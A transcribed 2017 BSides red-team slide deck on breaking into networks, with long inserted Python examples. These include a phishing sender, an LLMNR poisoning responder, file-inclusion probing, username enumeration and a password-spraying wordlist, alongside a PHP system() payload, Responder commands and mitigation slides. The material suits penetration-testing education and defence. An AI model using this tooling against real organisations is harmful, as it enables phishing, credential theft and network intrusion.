BSides Philly Finding a Company's BreakPoint

Post on 14-Apr-2017


Finding a Company’s BreakPoint

By: Zack Meyers & Andrew McNicol

Modern Day Hacking

Agenda

~$ whoami

Overview

Our Methodology

How to Go Beyond a Scan

1. Phishing

2. Web Application Vulnerabilities

3. Multicast Name Resolution Poisoning

4. SMB Relay Attacks

5. Account Compromise

Final Thoughts and Tips

Useful Training and Links

~$ whoami

Zack Meyers (@b3armunch)

Andrew McNicol (@primalsec)

Red Team @BreakPoint Labs (@0xcc_labs)

Bloggers/Podcasters @Primal Security (@primalsec)

Past: BSidesCHARM, BSidesDC, RVASec

Certification Junkies (OSCE, OSCP, GWAPT, GPEN etc.)

Python, CTFs, Learning, long walks on the beach (@AnnapolisSec)

Things Have Changed Since the 90s

Overview

Goal: Break the mindset of “Scan then Exploit”

Cover 5 ways we commonly break into a network:

1. Phishing

2. Web Application Vulnerabilities

3. Multicast Name Resolution Poisoning

4. SMB Relay Attacks

5. Account Compromise

Our Methodology (High Level)

Planning and Scoping

Reconnaissance

Mapping

Automated Testing

Manual Testing

Reporting

Remediation Support

How to Go Beyond a Scan

1. Mindset: Fail 1000s of times and Continue Trying

2. Recon + Mapping: Find Systems + Content Others Have Missed

3. Automated Testing: Run the appropriate tool for the job

4. Manual Testing:

Identify, Understand, and Fuzz all Areas of Input

Research all Version Specific Vulnerabilities

Combine Findings, Remove False Positives, and Abuse Features

5. Reporting: Highlight Business Impact

1. Phishing

[surprise] Phishing actually works. [/surprise]

Here is the process we generally follow:

1. Planning: Goals, ROE, what happens when the user clicks?

2. Determine Scenario: Ransomware, Targeted, etc.

3. Determine Phishing Domains

4. Find Vulnerabilities: Email Spoofing

5. Execute the Engagement

Full Blog Here: https://breakpoint-labs.com/phishing/

1. Phishing: Planning

Work with the customer to understand their needs for the Phishing

campaign (Compliance, Part of a larger engagement, etc.)

We prefer to send email via Python (the smtplib module)

We generally perform these three types of engagements:

1. Click Analysis: Determine how many users clicked a link

2. Credential Gathering: Prompt for Credentials

3. Execute Code: PowerShell, Office Macros, HTAs, etc.

CEO’s reaction to opening a phishing email

1. Phishing: Scenario

2 Main Types of Scenarios: Common Malware, and Targeted Attacker

UPS Tracking Ransomware: Cloned Site + Password Prompt:

1. Phishing: Phishing Domains

The scenario will determine what domains we leverage

If our goal is to perform a more targeted attack we will attempt to use a

domain similar to the target organization’s and clone its login portals:

breakpoint-labs.com vs. breakpoint-lab.com

If our goal is more common threat we will emulate those TTPs:

ups-pkgtracker.com

It’s important to submit phishing domains to the web content filter/proxy vendors ahead of time so they are categorized and not blocked as new/uncategorized on the day of the campaign

1. Phishing: Finding Vulnerabilities

Outlook client: the email below was sent from a Gmail account (email spoofing):

1. Phishing: Possible Scenarios

Click Analysis: We generally use Python to send email + create a unique

link per email to targets

Credential Grabbing: We generally use PHP to prompt for credentials

Execute Code: Usually leverage Empire (Office Macro, HTA method)
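As an added example (not the presenters’ own tooling), here is the click-analysis piece in Python: one message per target, each carrying a unique link whose token is an HMAC-tagged target id, so the click log maps back to a recipient and a curious user cannot walk t=1, 2, 3 and pollute the statistics. The campaign key, target list, sender address and tracking URL are all placeholders constructed for the example; `send_campaign` uses smtplib but is not invoked because it needs a live relay.

```python
import base64
import hashlib
import hmac
import secrets
import smtplib
from email.message import EmailMessage
from urllib.parse import urlencode

# Per-campaign secret. Assumption: generated once per engagement and kept with
# the campaign notes, never placed in the mail body or the tracking URL.
CAMPAIGN_KEY = secrets.token_bytes(32)


def make_token(target_id: int, key: bytes = CAMPAIGN_KEY) -> str:
    """Unique per-recipient link token: 4-byte target id || 8-byte HMAC-SHA256 tag.

    The tag makes ids unguessable, so a recipient forwarding or editing the
    link cannot register clicks for somebody else.
    """
    body = target_id.to_bytes(4, "big")
    tag = hmac.new(key, body, hashlib.sha256).digest()[:8]
    return base64.urlsafe_b64encode(body + tag).decode().rstrip("=")


def resolve_token(token: str, key: bytes = CAMPAIGN_KEY):
    """Map a clicked token back to its target id; None if forged or garbled."""
    try:
        raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    except (ValueError, TypeError):
        return None
    if len(raw) != 12:
        return None
    body, tag = raw[:4], raw[4:]
    expected = hmac.new(key, body, hashlib.sha256).digest()[:8]
    if not hmac.compare_digest(tag, expected):
        return None
    return int.from_bytes(body, "big")


def tracking_link(base_url: str, target_id: int, key: bytes = CAMPAIGN_KEY) -> str:
    return f"{base_url}?{urlencode({'t': make_token(target_id, key)})}"


def build_message(sender: str, target: dict, base_url: str, key: bytes = CAMPAIGN_KEY) -> EmailMessage:
    """One message per target, each with its own link (pretext text is a placeholder)."""
    link = tracking_link(base_url, target["id"], key)
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = target["email"]
    msg["Subject"] = "Action required: package delivery update"
    msg.set_content(
        f"Hello {target['name']},\n\nYour package could not be delivered. "
        f"Review the details here:\n{link}\n"
    )
    return msg


def build_campaign(sender: str, targets, base_url: str, key: bytes = CAMPAIGN_KEY):
    return [build_message(sender, t, base_url, key) for t in targets]


def send_campaign(messages, smtp_host: str, smtp_port: int = 587, username=None, password=None):
    """Deliver with the standard library; not exercised here (needs a live SMTP relay)."""
    with smtplib.SMTP(smtp_host, smtp_port) as smtp:
        smtp.starttls()
        if username:
            smtp.login(username, password)
        for m in messages:
            smtp.send_message(m)


# Constructed sample targets; addresses are placeholders, not engagement data.
TARGETS = [
    {"id": 1, "email": "jsmith@example.test", "name": "J. Smith"},
    {"id": 2, "email": "adoe@example.test", "name": "A. Doe"},
]

if __name__ == "__main__":
    for m in build_campaign("tracking@ups-pkgtracker.test", TARGETS, "https://ups-pkgtracker.test/track"):
        print(m["To"], "->", m.get_content().strip().splitlines()[-1])
```

The landing page only has to call `resolve_token` on the `t` parameter and record the id, source IP and timestamp; with the key kept server-side, a click is attributable to exactly one recipient and nothing else.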

2. Web Application Vulnerabilities

Is your input being presented on the screen? -> XSS

Is your input calling on stored data? -> SQLi

Does input generate an action to an external service? -> SSRF

Does your input call on a local or remote file? -> File Inclusion

Does your input end up on the file system? -> File Upload

Does your input cause another page to load? -> Redirect Vulns

Can we enumerate technology and versions? -> Lots of Vulns

2. Web App Vulns: File Inclusion

File inclusion vulns can lead to code execution when the sink is PHP include()/require()

Sometimes they are limited to just reading a file (the path ends up in a read such as file_get_contents() + echo rather than an include)

LFIs normally require you to get your input on disk first, then include

the affected resource (log poisoning: write PHP into a log via the User-Agent or request path, then include the log file)

RFIs are normally easier to exploit as you can point them to an

external resource containing your code (only possible when allow_url_include is on)

2. Web App Vulns: Step 1

Unlinked resource “debug.php”- HTTP 200 OK and blank screen

2. Web App Vulns: Step 2

Never underestimate the power of a good lunch!

2. Web App Vulns: Step 3

Parameters are fuzzed to enumerate inputs. "page=test" gives back a different

response: "Failed opening 'test' for inclusion"

2. Web App Vulns: Step 4

Attempt to execute code: point the page parameter at a file 1.php containing <?php system('id'); ?>

2. Web App Vulns: Step 5

IN REAL LIFE: The web service was running as SYSTEM!
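The steps above, from a blank-200 unlinked resource to a confirmed include() sink, as an added Python example (not the presenters’ tooling): the parameter fuzzing of Step 3 is a baseline diff, and the PHP warning text tells you which sink you hit, which decides whether you are looking at code execution or only file disclosure. The `fake_debug_php` fetcher is a constructed stand-in for the debug.php seen on the engagement; `http_fetch` is the real fetcher and is not exercised offline.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional

# Parameter names worth trying against an unlinked resource that returns a blank
# 200; "page" is the one that answered on the engagement described above.
COMMON_PARAMS = ["id", "file", "page", "path", "include", "template", "view",
                 "module", "lang", "dir", "cmd", "debug"]

# PHP warning fingerprints and the sink they point to.  Only an include-family
# sink gives code execution; the read-family sinks give file disclosure.
SINKS = [
    (re.compile(r"Failed opening '[^']*' for inclusion"), "include"),
    (re.compile(r"\b(?:include|require)(?:_once)?\([^)]*\): failed to open stream"), "include"),
    (re.compile(r"\b(?:file_get_contents|readfile|fopen|file)\([^)]*\): failed to open stream"), "read"),
]

Fetch = Callable[[str, Dict[str, str]], str]


def http_fetch(url: str, params: Dict[str, str], timeout: float = 10.0) -> str:
    """Real fetcher (urllib); plug it in instead of fake_debug_php on an engagement."""
    full = url + ("?" + urllib.parse.urlencode(params) if params else "")
    with urllib.request.urlopen(full, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def find_live_parameters(fetch: Fetch, url: str, names: Iterable[str], probe: str = "test") -> Dict[str, str]:
    """Step 3 as a baseline diff: return {name: body} for every parameter whose
    presence changes the response relative to the bare request."""
    baseline = fetch(url, {})
    hits = {}
    for name in names:
        body = fetch(url, {name: probe})
        if body != baseline:
            hits[name] = body
    return hits


def classify_sink(body: str) -> Optional[str]:
    """'include' (code execution candidate), 'read' (file disclosure) or None."""
    for pattern, sink in SINKS:
        if pattern.search(body):
            return sink
    return None


def fake_debug_php(url: str, params: Dict[str, str]) -> str:
    """Constructed stand-in for the unlinked debug.php: blank unless ?page= is set,
    then the warnings PHP prints when include() cannot find the file."""
    page = params.get("page")
    if page is None:
        return ""
    return (
        f"<br />\n<b>Warning</b>:  include({page}): failed to open stream: "
        f"No such file or directory in <b>/var/www/html/debug.php</b> on line <b>3</b><br />\n"
        f"<b>Warning</b>:  include(): Failed opening '{page}' for inclusion "
        f"(include_path='.:/usr/share/php') in <b>/var/www/html/debug.php</b> on line <b>3</b><br />\n"
    )


def triage(fetch: Fetch, url: str) -> Dict[str, Optional[str]]:
    """Live parameters mapped to the sink their error text reveals."""
    hits = find_live_parameters(fetch, url, COMMON_PARAMS)
    return {name: classify_sink(body) for name, body in hits.items()}


if __name__ == "__main__":
    print(triage(fake_debug_php, "http://target.test/debug.php"))
```

An "include" verdict is where Step 4 starts (remote file if allow_url_include is on, otherwise log poisoning or another on-disk write); a "read" verdict is a file disclosure finding and nothing more unless another primitive is found.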

3. Multicast Name Resolution Poisoning

Most internal networks still have fallback name resolution enabled via the

following protocols:

Link-Local Multicast Name Resolution (LLMNR)

NetBIOS Name Service (NBT-NS)

Multicast DNS (mDNS)

When DNS cannot resolve a name (a typo, a decommissioned file server, a stale

mapped drive), Windows falls back to asking the local segment, and any host

can answer. By listening for, intercepting and answering that traffic an attacker

can redirect the victim's authentication attempt to themselves and perform

Man in the Middle (MITM) attacks.

Responder!

3. Enter Responder.py

Responder is a Python script that aids in:

Multicast/broadcast name resolution poisoning (LLMNR, NBT-NS, mDNS)

WPAD spoofing (Web Proxy Auto-Discovery): answering the "wpad" lookup so the

attacker's unauthorized box becomes the proxy for all of the victim's HTTP requests to the Internet

MITM attacks (intercepting credential exchanges between hosts, leading to

password cracking, pass the hash, SMB relay attacks, etc.)

Rogue server services (SMTP, IMAP, POP3, SMB, Kerberos, FTP, HTTP, HTTPS,

DNS, LDAP, SQL, etc.) that capture whatever credentials the redirected victims send

3. Responder.py - Use Case 1 Rogue Services

Syntax: ~$ responder -I eth0 -f   (-I: interface to poison on; -f: fingerprint the hosts that issue queries)

3. Responder.py - Use Case 2 WPAD

Syntax: ~$ responder -I eth0 -bw   (-w: serve a rogue WPAD proxy; -b: ask for HTTP Basic auth so credentials arrive in cleartext instead of as NTLM hashes)

3. Responder.py - Use Case 3 Analyze

Syntax: ~$ responder -I eth0 -A   (-A: analyze mode, log LLMNR/NBT-NS/mDNS queries without answering them; a safe way to see who would be affected before poisoning)

3. Prevent Multicast Name Resolution Attacks

Preventing multicast name resolution attacks through:

Disable broadcast protocols: LLMNR (Link-Local Multicast Name Resolution, via Group Policy) and

NBT-NS (NetBIOS Name Service, via the adapter's WINS settings)

Prevent WPAD poisoning with a WPAD entry in DNS (and turn off automatic proxy detection where it is not needed)

Segment the local networks with VLANs to limit the impact (poisoning only reaches the attacker's own broadcast domain)

Ensure that only NTLMv2 is in use rather than LM and NTLM (captured NTLMv2 responses are far harder to crack; note this does not stop relaying)
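The exchange described in this section, as an added Python example that is not part of the talk: LLMNR is DNS wire format on UDP 5355 to 224.0.0.252, so a query is a 12-byte header plus one question, and a poisoner simply echoes the transaction id and question back with the QR bit set and an A record pointing at itself. The same code doubles as a prevention check: send a query for a canary name that cannot exist on your network, and any answer at all means someone is poisoning. Hostname and IP values are constructed; `probe_canary` needs a real network and is not exercised offline.

```python
import random
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
FLAG_RESPONSE = 0x8000  # QR bit in the DNS/LLMNR header


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Return (name, offset after the name); follows DNS compression pointers."""
    labels = []
    while True:
        length = buf[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:
            ptr = ((length & 0x3F) << 8) | buf[off]
            off += 1
            sub, _ = decode_name(buf, ptr)
            labels.append(sub)
            break
        labels.append(buf[off:off + length].decode())
        off += length
    return ".".join(labels), off


def build_query(name: str, txid=None, qtype: int = 1) -> bytes:
    """What a Windows host sends when DNS fails: one question, type A, class IN."""
    txid = random.randrange(0x10000) if txid is None else txid
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def parse_response(buf: bytes):
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", buf[:12])
    off = 12
    questions = []
    for _ in range(qd):
        name, off = decode_name(buf, off)
        off += 4  # qtype + qclass
        questions.append(name)
    answers = []
    for _ in range(an):
        name, off = decode_name(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return txid, flags, questions, answers


def build_answer(query: bytes, ip: str) -> bytes:
    """What a poisoner sends back: same txid and question, QR set, one A record -> ip."""
    txid = struct.unpack(">H", query[:2])[0]
    name, off = decode_name(query, 12)
    question = query[12:off + 4]
    header = struct.pack(">HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    rr = encode_name(name) + struct.pack(">HHIH", 1, 1, 30, 4) + socket.inet_aton(ip)
    return header + question + rr


def poisoned_ips(query: bytes, reply: bytes):
    """IPs offered in a reply that matches our query; non-empty == somebody answered."""
    txid, flags, _questions, answers = parse_response(reply)
    if txid != struct.unpack(">H", query[:2])[0] or not flags & FLAG_RESPONSE:
        return []
    return [ip for _name, ip in answers]


def probe_canary(name=None, timeout: float = 2.0):
    """Prevention check: ask for a name that cannot exist; any answerer is a poisoner."""
    name = name or "canary-%08x" % random.getrandbits(32)
    query = build_query(name)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            ips = poisoned_ips(query, data)
            if ips:
                hits.append((src, ips))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits
```

Run `probe_canary()` from a workstation on each VLAN as a standing check: on a clean segment it returns an empty list, and after LLMNR is disabled by policy the real test is that your own hosts stop sending the query at all (Responder's -A mode shows who still does).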

4. SMB Relay Attacks

SMB relay attacks occur when an attacker inserts themselves into the NTLM

challenge/response exchange: instead of capturing the victim's response to crack it,

the attacker forwards (relays) it to another host and is authenticated there as the

victim, without ever learning the password.

The attacker needs the victim to initiate an HTTP or SMB connection to them.

This initiation often comes from either:

LLMNR/NBT-NS spoofing

Automated processes attempting to authenticate to systems

(ex. patch management, antivirus updates, vulnerability scanners,

custom admin scripts, etc.)

So You Started a Scan

4. SMB Relay Attack Visual: Automated Process

4. SMB Relay Attack: Multicast Poisoning

Attackers IP: 192.168.56.103

Windows Client (Target): 192.168.56.105

Windows DC: 192.168.56.102

4. SMB Relay Attack: Multicast Poisoning Cont.

4. SMB Relay Attack: Multicast Poisoning Cont.

4. SMB Relay Attack: Nessus Scanner Scenario

4. Prevent SMB Relay Attacks

Preventing SMB relay attacks through:

Require SMB signing on every host, not just domain controllers (a relayed session cannot produce a valid signature and is rejected)

Disable broadcast protocols: LLMNR (Link-Local Multicast Name Resolution) and

NBT-NS (NetBIOS Name Service)

Prevent WPAD poisoning with a WPAD entry in DNS

Block outbound SMB (TCP 445) at the perimeter so internal hosts cannot be coaxed into authenticating to the Internet

Enable EPA (Extended Protection for Authentication) on TLS-fronted services such as HTTPS and LDAPS
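The first mitigation is the one to verify on every host, because a relay only works against a target that does not require signing. As an added example (not the presenters’ tooling), here is a Python probe that speaks just enough SMB2 to send a NEGOTIATE and read the SecurityMode field of the response, which is the same check that CrackMapExec and Nmap's smb2-security-mode script perform. The parser is exercised on constructed responses; `probe(host)` opens a real TCP connection to port 445 and is not run offline. Hostnames and the server GUID are placeholders.

```python
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB1_MAGIC = b"\xffSMB"
SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002  # NEGOTIATE SecurityMode bits

# SMB2 header after the 4-byte ProtocolId: StructureSize, CreditCharge, Status,
# Command, Credits, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
HEADER_FMT = "<HHIHHIIQIIQ16s"


def smb2_header(command: int, flags: int = 0) -> bytes:
    return SMB2_MAGIC + struct.pack(HEADER_FMT, 64, 0, 0, command, 1, flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def netbios_wrap(pkt: bytes) -> bytes:
    """Direct-TCP SMB: 4-byte NetBIOS session header carrying the length."""
    return b"\x00" + len(pkt).to_bytes(3, "big") + pkt


def negotiate_request(dialects=(0x0202, 0x0210)) -> bytes:
    """SMB2 NEGOTIATE offering the 2.0.2 and 2.1 dialects; we advertise signing enabled."""
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0, uuid.uuid4().bytes, 0)
    body += struct.pack("<%dH" % len(dialects), *dialects)
    return netbios_wrap(smb2_header(SMB2_NEGOTIATE) + body)


def parse_negotiate_response(data: bytes) -> dict:
    """Pull dialect and SecurityMode out of a NEGOTIATE response."""
    pkt = data[4:]  # strip NetBIOS session header
    if pkt[:4] == SMB1_MAGIC:
        raise ValueError("server answered with SMB1; check signing via the SMB1 path instead")
    if len(pkt) < 64 + 6 or pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet")
    status, command = struct.unpack_from("<IH", pkt, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError("unexpected command %#x / status %#x" % (command, status))
    _size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def relay_verdict(info: dict) -> str:
    if info["signing_required"]:
        return "signing required: a relayed NTLM session to this host would be rejected"
    return "signing NOT required: a relayed NTLM session to this host would be accepted"


def probe(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Live check; not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        data = s.recv(4096)
    return parse_negotiate_response(data)


def fake_negotiate_response(security_mode: int, dialect: int = 0x0210) -> bytes:
    """Constructed server reply with the given SecurityMode (flags 0x1 = server-to-client)."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x11" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0, 0, 0) + b"\x00"
    return netbios_wrap(smb2_header(SMB2_NEGOTIATE, flags=0x1) + body)


if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        print(relay_verdict(parse_negotiate_response(fake_negotiate_response(mode))))
```

A Windows member server reports signing enabled but not required by default, which is exactly what the relay in the Nessus scanner scenario above needs; only domain controllers require it out of the box, so run the probe across the whole range rather than spot-checking.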

5. Account Compromise

Combines several vulnerabilities to demonstrate risk:

Username enumeration (Low)

+ Lack of automation controls (Low)

+ Lack of password complexity requirements (Low)

= Account compromise (Critical)

5. Acct Comp: Username Enumeration

Password reset feature: "Email address not found"

Login error message: "Invalid Username"

Contact Us features: "Which admin do you want to contact?"

Timing of login attempts: valid = 0.4 secs, invalid = 15 secs

User registration: "Username already exists"

Various error messages and HTML source

Google hacking and OSINT

Sometimes the application just tells you
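The oracles listed above all reduce to one test: does the response for a candidate username differ from the response for a username that cannot exist? As an added Python example (not the presenters’ tooling), here is that comparison over a set of login probes, using random canary names to establish the "invalid user" baseline and flagging any candidate whose status, message or timing departs from it. The probe records are constructed to mirror the timing difference quoted above; collecting them is a matter of replaying the request from Burp with a throwaway password.

```python
from dataclasses import dataclass
from statistics import median
from typing import Dict, Iterable, List


@dataclass
class Probe:
    """One login attempt with a throwaway password: what came back and how fast."""
    username: str
    status: int
    body: str
    elapsed: float  # seconds


def fingerprint(p: Probe):
    """The parts of a response that should not depend on which user was tried."""
    return (p.status, " ".join(p.body.split()))


def enumerate_users(probes: Iterable[Probe], canaries: Iterable[str],
                    timing_factor: float = 3.0) -> Dict[str, List[str]]:
    """Flag usernames whose response or timing differs from the canaries'.

    Canaries are random names that cannot exist, so whatever they get back is the
    'invalid username' behaviour; anything else is evidence the name is valid.
    """
    canaries = set(canaries)
    probes = list(probes)
    canary_probes = [p for p in probes if p.username in canaries]
    if not canary_probes:
        raise ValueError("need at least one canary probe for the invalid-user baseline")
    baseline_fps = {fingerprint(p) for p in canary_probes}
    baseline_t = median(p.elapsed for p in canary_probes)
    findings: Dict[str, List[str]] = {}
    for p in probes:
        if p.username in canaries:
            continue
        reasons = []
        if fingerprint(p) not in baseline_fps:
            reasons.append("response differs from baseline: %d %r" % (p.status, fingerprint(p)[1]))
        if baseline_t > 0 and not (baseline_t / timing_factor <= p.elapsed <= baseline_t * timing_factor):
            reasons.append("timing %.2fs vs baseline %.2fs" % (p.elapsed, baseline_t))
        if reasons:
            findings[p.username] = reasons
    return findings


# Constructed sample: two canaries plus three candidates against a login form that
# answers "Invalid Username" slowly and "Invalid Password" quickly.
CANARIES = ["qx7zk_nobody", "vv9_nonexistent"]
SAMPLE_PROBES = [
    Probe("qx7zk_nobody", 401, "Invalid Username", 15.1),
    Probe("vv9_nonexistent", 401, "Invalid Username", 14.8),
    Probe("admin", 401, "Invalid Password", 0.4),
    Probe("jsmith", 401, "Invalid Password", 0.5),
    Probe("guest", 401, "Invalid Username", 15.0),
]

if __name__ == "__main__":
    for user, why in enumerate_users(SAMPLE_PROBES, CANARIES).items():
        print(user, "->", "; ".join(why))
```

Send several canaries rather than one so a single slow response does not skew the baseline, and run the same comparison against the password reset, registration and mobile/API endpoints, since each is a separate oracle.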

5. Acct Comp: Automation Controls

Pull the auth request up in Burp’s Repeater and try it a few times

No sign of automation controls? -> Burp Intruder

- No account lockout

- Non-existent or weak CAPTCHA

- Main login is strong, but what about the others? (Mobile interface, API, etc.)

5. Acct Comp: Weak Passwords

We as humans are bad at passwords…here are some tricks:

- Password the same as the username

- Variations of “password”: “p@ssw0rd”…

- Month+Year, Season+Year: winter2015…

- Company name + year

- Keyboard walks / “PW generator” patterns: “!QAZ2wsx”

Lots of wordlists out there, consider making a targeted wordlist

Research the targeted user’s interests and build lists around those interests
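The password patterns above, turned into a targeted wordlist generator as an added Python example (it is not the presenters’ tooling): leet variations of common base words, season/month/company/interest stems with year and suffix combinations, usernames reused as passwords, and QWERTY row and column walks such as "!QAZ2wsx". The company name, years, interests and usernames passed in are placeholders for whatever recon on the target turns up.

```python
import itertools
from typing import Iterable, List

LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}
SEASONS = ["spring", "summer", "fall", "autumn", "winter"]
MONTHS = ["january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december"]
BASE_WORDS = ["password", "welcome", "letmein", "changeme"]
SUFFIXES = ["", "!", "1", "123", "#"]

# QWERTY columns (unshifted and shifted) and rows for "walk the keyboard" patterns.
COLUMNS = ["1qaz", "2wsx", "3edc", "4rfv", "5tgb", "6yhn", "7ujm", "8ik,", "9ol.", "0p;/"]
SHIFTED = ["!QAZ", "@WSX", "#EDC", "$RFV", "%TGB", "^YHN", "&UJM", "*IK<", "(OL>", ")P:?"]
ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]


def leet_variants(word: str) -> List[str]:
    """Every combination of LEET substitutions applied across the whole word
    (so 'password' yields p@ssword, passw0rd, p@ssw0rd, p@$$w0rd, ...)."""
    w = word.lower()
    letters = [c for c in LEET if c in w]
    out = []
    for r in range(len(letters) + 1):
        for chosen in itertools.combinations(letters, r):
            out.append("".join(LEET[c] if c in chosen else c for c in w))
    return out


def case_variants(word: str) -> List[str]:
    return [word, word.lower(), word.capitalize(), word.upper()]


def keyboard_walks() -> List[str]:
    walks = []
    for row in ROWS:
        for n in (6, 8, len(row)):
            walks.append(row[:n])
    for a, b in zip(COLUMNS, COLUMNS[1:]):
        walks.append(a + b)          # 1qaz2wsx
    for a, b in zip(SHIFTED, COLUMNS[1:]):
        walks.append(a + b)          # !QAZ2wsx
    for a, b in zip(COLUMNS, SHIFTED[1:]):
        walks.append(a + b)          # 1qaz@WSX
    return walks


def build_wordlist(company: str, years: Iterable[int], interests: Iterable[str] = (),
                   usernames: Iterable[str] = ()) -> List[str]:
    """Ordered, de-duplicated list: stems x year tags x suffixes, usernames, walks."""
    stems: List[str] = []
    for w in BASE_WORDS:
        for v in leet_variants(w):
            stems.extend(case_variants(v))
    for w in [company, *interests, *SEASONS, *MONTHS]:
        stems.extend(case_variants(w))
    year_tags = [""]
    for y in years:
        year_tags += [str(y), str(y)[-2:]]
    words: List[str] = []
    for stem in stems:
        for y in year_tags:
            for s in SUFFIXES:
                words.append(stem + y + s)
    for u in usernames:
        words.append(u)                      # password == username
        for y in year_tags[1:]:
            words.append(u + y)
    words.extend(keyboard_walks())
    return list(dict.fromkeys(words))


if __name__ == "__main__":
    wl = build_wordlist("BreakPoint", [2016, 2017], interests=["ravens"], usernames=["jsmith"])
    print(len(wl), "candidates; first:", wl[:5])
```

Feed the output to Burp Intruder or Hydra one password at a time across all users (password spraying) rather than many passwords per user, so a lockout policy, if one exists, is not tripped.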

5. Acct Comp: Default and Shared

Attempt to brute force across all the things

Brute Force Tools: Burp Suite’s Intruder, Hydra, CrackMapExec, MSF SMB

modules, Nmap, etc.

Always try default creds for any given technology

We commonly see shared Linux root creds, and shared Windows local admin

creds across the entire enterprise

Final Thoughts and Tips

Use Shodan and Censys.io for external reconnaissance

Make sure you investigate shares (enum4linux)

Unlinked Content enumeration on web applications is key

Passwords written down on sticky notes? Yes, usually

Can you reset a PW via the Help Desk?

Put a focus on feature abuse: What does the technology let you do? How can

you abuse that functionality?

Once you get valid credentials try them across all the things

Useful Trainings & Links

Free Training: Cybrary

CTFs: Vulnhub, Past CTF Writeups, Pentester Lab

Training: Offensive Security, SANS, SecurityTube

Book: The Web Application Hacker’s Handbook

Book: Black Hat Python

Talks: IronGeek (Adrian Crenshaw’s) YouTube Channel

Talk: How to Shot Web - Jason Haddix

Talk: How to be an InfoSec Geek - Primal Security

Talk: File in the hole! - Soroush Dalili

Talk: Exploiting Deserialization Vulnerabilities in Java

Talk: Polyglot Payloads in Practice - Marcus Niemietz

Talk: Running Away From Security - Micah Hoffman

Talk: Beyond Automated Testing – Us!

GitHub Resource: Security Lists For Fun & Profit

Contact Us

Site: https://www.breakpoint-labs.com

Email: info@breakpoint-labs.com

Twitter: @0xcc_labs

We Are Hiring – Remote Positions Available